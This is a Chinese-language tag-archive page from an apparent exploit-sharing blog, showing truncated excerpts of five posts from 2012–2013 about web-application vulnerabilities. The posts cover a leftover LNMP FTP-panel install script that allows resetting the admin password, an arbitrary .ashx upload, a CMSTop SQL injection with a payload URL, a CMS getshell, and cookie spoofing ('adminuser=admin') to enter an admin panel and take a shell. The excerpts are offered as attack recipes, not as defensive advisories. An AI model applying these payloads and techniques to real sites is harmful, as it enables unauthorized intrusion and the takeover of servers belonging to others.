标签 漏洞 下的文章

LNMP ftp控制面板安装程式未删除的漏洞

1、lnmp一键环境包0.9中有个pureftpd的安装选项,安装时同时会安装一个PHP的控制面板。但是很少有人注意这个面板的有个install.php脚本。访问路径为 http://0day5.com/ftp/install.php2、这个安装脚本会在第五步让用户修改ftp面板的Admin用户的密码或添加ftp面板的管理员。3、添加成功后即可访问ftp的面板,接着我们就可以添加ftp的用户...

没穿底裤 2013 年 12 月 08 日 暂无评论

桃源网络硬盘2.x for .NET版本任意文件上传漏洞

没有过滤ashx上传1.ashx文件访问目录http://0day5.com/myfile/用户名/1.ashxtest code: [php] using System;using System.Web;public class Handler : IHttpHandler {public void ProcessRequest (HttpContext context) {context...

没穿底裤 2013 年 12 月 08 日 暂无评论

cmstop通杀注入漏洞

玩了几个月这个漏洞了 看到九区那边ztz大牛公布出exp了漏洞文件/apps/vote/controller/vote.php app.xxx.com/?app=vote&controller=vote&action=total&contentid=1获取管理员id [php] ?app=vote&controller=vote&action=total&contentid=1 and 1=...

没穿底裤 2013 年 11 月 29 日 暂无评论

简单CMS Getshell漏洞

[php]public function saveAvatar() {session_start ();define ( 'SD_ROOT', dirname ( __FILE__ ) . '/' );@header ( "Expires: 0" );@header ( "Cache-Control: private, post-check=0, pre-check=0, max-age=0...

没穿底裤 2013 年 10 月 30 日 暂无评论

淘客帝国cms系统后台cookie欺骗漏洞及后台拿shell

偶然发现的淘客帝国免费版的后台可以cookie欺骗工具: 老兵的cookie’欺骗工具 关键字: 分类- 商城- 品牌- 女人- 男人- 美容- 鞋包- 数码- 居家- 食品首先打开工具把cookie改为 COOKIEadminuser=admin; DedeUserID=1; PHPSESSID=11111 ,然后再工具的地址栏那里输入网站的后台(默认后台/admin)等页面全部出来后再在...

没穿底裤 2012 年 11 月 30 日 暂无评论